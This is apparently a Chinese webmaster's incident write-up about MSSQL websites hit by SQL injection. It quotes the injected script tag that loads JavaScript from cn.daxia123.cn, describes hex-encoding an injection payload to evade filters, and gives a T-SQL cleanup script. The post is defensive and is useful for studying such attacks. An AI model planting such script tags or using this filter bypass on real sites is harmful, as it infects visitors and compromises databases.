网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因

------------------------------------------------------------

网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因

客户站，出现生成不了，被挂马。谈不上解决，只找到原因
现状：
各CMS系统无法生成，但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”
受影响对象：采用MSSQL数据库的网站
症状内容：在多个表当中出现挂马代码，如<Script Src=http://cn.daxia123.cn/cn.js> </Script>
　　　　　数据库出现新增表：如kill_kk表，xiaolu表
分析如下：
　　kill_kk表为入侵者读取网站根目录的工具，被入侵网站的根目录下所有的文件夹与文件名都保存在此。
　　xiaolu表：只有一个字段CMD，二进制位。原因不详。
　　多个表中的字段内出现挂马内容，字段多为vchar,字段长度大于100，
被攻击原因如下：
　　攻击者将攻击代码用2进制，或10或10进制编译成了类似于这样的代码：0x4445434C415245204054205641524348415228323535292C404 放sql注入的代码不能检测出来，但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。
　　但是，这个代码仅对能解释它的sql server这样的数据库有效，针对access这样的不能解释它的数据库类型攻击无效。
希望微软尽快发补丁。
临时清除办法：
1、批量查找哪些表被挂马了，这一步对大站多表很有用

declare     @str     varchar ( 100 )  
set     @str = ' daxia123 '    // 这地方放你所被挂马的关键字；
    
declare     @s     varchar ( 8000 )  
declare    tb    cursor    local    for   
select    s = ' if   exists(select   1   from   [ ' + b.name + ' ]   where   [ ' + a.name + ' ]   like    % +@str+ %)  
    print    '' 所在的表及字段:   [ ' + b.name + ' ].[ ' + a.name + ' ] '''   
from    syscolumns   a    join    sysobjects   b    on    a.id = b.id  
where    b.xtype = ' U '     and    a.status >= 0   
     and    a.xusertype    in ( 175 , 239 , 231 , 167 )  
open    tb  
fetch     next     from    tb    into     @s   
while     @@fetch_status = 0   
begin   
     exec ( @s )  
     fetch     next     from    tb    into     @s   
end   
close    tb  
deallocate    tb

代码执行完，会提示哪些表中招了。
你再去清除相关字段内容。

临时解决办法：
查找所有vchar型且字段长度比较大的字段，尽量改小长度。
再通过判断post值的长度来临时解决